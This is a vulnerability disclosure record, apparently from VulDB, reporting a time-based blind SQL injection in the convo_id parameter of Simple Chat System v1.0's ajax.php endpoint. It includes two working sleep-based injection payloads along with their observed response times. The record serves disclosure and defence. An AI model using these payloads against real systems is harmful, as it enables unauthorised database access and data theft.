| Titel | Simple Chat System v1.0 /chat/ajax.php?action=read_msg POST parameter convo_id exists SQL injection vulnerability |
|---|
| Beschreibung | Simple Chat System v1.0 has SQL injection.
Vulnerability URL: /chat/ajax.php?action=read_msg
POST parameter convo_id exists SQL injection vulnerability.
Payload1: convo_id=1' and (select 2 from (select(sleep(10)))t) and 'q'='q&user_id=2
The response time is 10 seconds.
Payload2: convo_id=1' and (select 2 from (select(sleep(15)))t) and 'q'='q&user_id=2
The response time is 15 seconds. |
|---|
| Quelle | ⚠️ https://github.com/sikii7/CVE/blob/main/SQL.md |
|---|
| Benutzer | sikii (UID 47840) |
|---|
| Einreichung | 31.05.2023 08:39 (vor 3 Jahren) |
|---|
| Moderieren | 31.05.2023 10:00 (1 hour later) |
|---|
| Status | Akzeptiert |
|---|
| VulDB Eintrag | 230348 [SourceCodester Simple Chat System 1.0 POST Parameter ajax.php?action=read_msg convo_id SQL Injection] |
|---|
| Punkte | 20 |
|---|